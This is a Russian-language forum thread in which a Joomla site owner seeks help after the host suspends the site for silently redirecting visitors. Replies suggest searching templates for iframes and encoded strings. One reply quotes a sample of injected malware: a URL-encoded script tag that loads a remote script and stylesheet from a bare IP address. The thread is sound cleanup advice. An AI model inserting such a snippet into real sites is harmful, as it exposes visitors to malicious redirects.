Заставьте сайт работать! )

[crazy_mailman]

Заставьте сайт работать! )

Уважаемые, нужна помощь!

Сайт содержит уязвимость, благодаря использованию которой при хождении по страницам сайта можно незаметно для себя перейти по произвольной ссылке. Техподдержка хостера этот момент углядела и не задумываясь отключила сайт "до устранения".
Все контакты с человеком, разрабатывавшим сайт, благополучно утеряны.

Очень нужна помощь специалиста, способного устранить уязвимость. Используется CMS Joomla.

Разумная оплата деньгами.

Подробности в личку.

 

[maxshevtsov]

Смотри, уязвимость не в жомле, а троян атаковал либо хостера, либо у тебя на компе полно вирусов (либо у того кто ходил по Ftp). Могу исправить мне нужен аккаунт к ftp. Те вирусы которые попадались мне я исправлял довольна таки быстро, по деньгам не скажу надо посмотреть ну думаю не много.

 

[3em]

поищи в шаблонах и скриптах iframe и всякие непонятные буквы рядом с числом 64. Это либо в конце файла, либо до </head>

 

[storm_ua]

Тільки зареєстровані користувачі бачать весь контент у цьому розділі

, если действительно инфекция в первую очередь ищи в index.php непонятный для тебя кусок кода заключенный в <script></script>

выглядит это примерно так:

<script>'%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%27%4a%61%76%61%53%63%72%69%70%74%27%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%32%31%32%2e%31%35%30%2e%33%34%2e%31%31%34%2f%70%6f%70%75%70%2e%70%68%70%3f%69%64%3d%31%35%39%34%31%26%73%69%74%65%3d%31%32%30%36%34%34%27%3e%3c%2f%73%63%72%69%70%74%3e%3c%6c%69%6e%6b%20%72%65%6c%3d%27%73%74%79%6c%65%73%68%65%65%74%27%20%68%72%65%66%3d%27%68%74%74%70%3a%2f%2f%32%31%32%2e%31%35%30%2e%33%34%2e%31%31%34%2f%70%6f%70%5f%73%74%79%6c%65%31%2e%63%73%73%27%20%74%79%70%65%3d%27%74%65%78%74%2f%63%73%73%27%3e'</script>

сохрани на всякий случай index.php, вырежи в оригинале это. снова проверь сайт на вирус.

 

[***SILVER***]

Ставь Firebug к Firefox и поэлементно листай дерево dom-узлов.. Думаю какая нить зацепка появиться